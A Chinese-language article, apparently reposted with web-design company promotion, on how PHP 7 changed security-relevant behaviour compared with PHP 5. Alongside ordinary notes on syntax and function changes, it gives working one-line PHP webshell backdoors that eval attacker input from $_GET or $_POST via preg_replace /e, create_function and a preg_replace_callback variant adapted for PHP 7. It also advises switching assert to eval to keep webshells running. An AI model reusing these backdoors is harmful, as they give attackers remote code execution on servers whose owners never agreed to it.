本篇內(nèi)容主要講解“PHP7和PHP5在安全上有什么區(qū)別”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“PHP7和PHP5在安全上有什么區(qū)別”吧!
創(chuàng)新互聯(lián)建站是一家專業(yè)提供辛集企業(yè)網(wǎng)站建設,專注與成都網(wǎng)站建設、網(wǎng)站建設、H5建站、小程序制作等業(yè)務。10年已為辛集眾多企業(yè)、政府機構(gòu)等服務。創(chuàng)新互聯(lián)專業(yè)的建站公司優(yōu)惠進行中。
函數(shù)修改
1. preg_replace()不再支持/e修飾符
<?php preg_replace("/.*/e",$_GET["h"],"."); ?>利用\e修飾符執(zhí)行代碼的后門大家也用了不少了,具體看官方的這段描述:
| 如果設置了這個被棄用的修飾符, preg_replace() 在進行了對替換字符串的 后向引用替換之后, 將替換后的字符串作為php 代碼評估執(zhí)行(eval 函數(shù)方式),并使用執(zhí)行結(jié)果 作為實際參與替換的字符串。單引號、雙引號、反斜線()和 NULL 字符在 后向引用替換時會被用反斜線轉(zhuǎn)義. |
很不幸,在PHP7以上版本不在支持\e修飾符,同時官方給了我們一個新的函數(shù)preg_replace_callback:
這里我們稍微改動一下就可以利用它當我們的后門:
<?php preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]); ?>
2. create_function()被廢棄
<?php $func =create_function('',$_POST['cmd']);$func(); ?>少了一種可以利用當后門的函數(shù),實際上它是通過執(zhí)行eval實現(xiàn)的。可有可無。
3. MySQL_*系列全員移除
如果你要在PHP7上面用老版本的mysql_*系列函數(shù)需要你自己去額外裝了,官方不在自帶,現(xiàn)在官方推薦的是mysqli或者pdo_mysql。這是否預示著未來SQL注入漏洞在PHP上的大幅減少呢~
4. unserialize()增加一個可選白名單參數(shù)
$data = unserialize($serializedObj1 , ["allowed_classes" => true]); $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]);
其實就是一個白名單,如果反序列數(shù)據(jù)里面的類名不在這個白名單內(nèi),就會報錯。

像這樣的報錯!
可以是類名也可以是布爾數(shù)據(jù),如果是FALSE就會將所有的對象都轉(zhuǎn)換為__PHP_Incomplete_Class對象。TRUE是沒有限制的。也可以傳入類名實現(xiàn)白名單。
還好現(xiàn)在是可選不是必選,要是默認FALSE逼程序員弄白名單那就真的吐血了。
5. assert()默認不在可以執(zhí)行代碼
這就是眾多馬不能用的罪魁禍首了,太多的馬用assert()來執(zhí)行代碼了,這個更新基本就團滅,一般情況下修改成eval即可正常運行了~
提一下,菜刀在實現(xiàn)文件管理器的時候用的恰好也是assert函數(shù),這導致菜刀沒辦法在PHP7上正常運行。
語法修改
1. foreach不再改變內(nèi)部數(shù)組指針
<?php $a = array('1','2','3'); foreach ($a as $k=>&$n){ echo ""; } print_r($a); foreach ($a as $k=>$n){ echo ""; } print_r($a);這樣的代碼在php5中,是這樣的執(zhí)行結(jié)果:

因為數(shù)組最后一個元素的 $value 引用在 foreach 循環(huán)之后仍會保留,在第二個循環(huán)的時候?qū)嶋H上是對之前的指針不斷的賦值。php7中通過值遍歷時,操作的值為數(shù)組的副本,不在對后續(xù)操作進行影響。
這個改動影響了某些cms的洞在PHP7上無法利用了….你知道我指的是哪個洞的。
這個問題在PHP7.0.0以后的版本又被改回去了,只影響這一個版本。
2. 8進制字符容錯率降低
在php5版本,如果一個八進制字符如果含有無效數(shù)字,該無效數(shù)字將被靜默刪節(jié)。
<?php echo octdec( '012999999999999' ) . "\n"; echo octdec( '012' ) . "\n"; if (octdec( '012999999999999' )==octdec( '012' )){ echo ": )". "\n"; }比如這樣的代碼在php5中的執(zhí)行結(jié)果如下:

但是在php7里面會觸發(fā)一個解析錯誤。
這個問題同樣在PHP7.0.0以后的版本又被改回去了,只影響這一個版本。
3. 十六進制字符串不再被認為是數(shù)字
這個修改一出,以后CTF套路會少很多啊~
很多騷操作都不能用了~
這個沒什么好說的,大家都懂。
<?php var_dump("0x123" == "291"); var_dump(is_numeric("0x123")); var_dump("0xe" + "0x1"); var_dump(substr("foo", "0x1")); ?>以上代碼在PHP5運行結(jié)果如下:

PHP7運行結(jié)果如下:

你以為我要說這個在后續(xù)版本被改回去了?不,目前截至PHP7.3版本依然沒有改回去的征兆,官方稱不會在改了。這個講道理還是蠻傷的。
4. 移除了 ASP 和 script PHP 標簽

現(xiàn)在只有這樣的標簽能在php7上運行了。
字面意思,影響其實不是很大(只是以后騷套路會少一點)。
5. 超大浮點數(shù)類型轉(zhuǎn)換截斷
將浮點數(shù)轉(zhuǎn)換為整數(shù)的時候,如果浮點數(shù)值太大,導致無法以整數(shù)表達的情況下, 在PHP5的版本中,轉(zhuǎn)換會直接將整數(shù)截斷,并不會引發(fā)錯誤。 在PHP7中,會報錯。
CTF又少一個出題套路,這個問題我只在CTF上見過,影響應該不大。
到此,相信大家對“PHP7和PHP5在安全上有什么區(qū)別”有了更深的了解,不妨來實際操作一番吧!這里是創(chuàng)新互聯(lián)網(wǎng)站,更多相關(guān)內(nèi)容可以進入相關(guān)頻道進行查詢,關(guān)注我們,繼續(xù)學習!
網(wǎng)頁題目:PHP7和PHP5在安全上有什么區(qū)別
網(wǎng)站網(wǎng)址:http://www.chinadenli.net/article10/pisego.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設計公司、Google、搜索引擎優(yōu)化、App設計、網(wǎng)站設計、營銷型網(wǎng)站建設
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)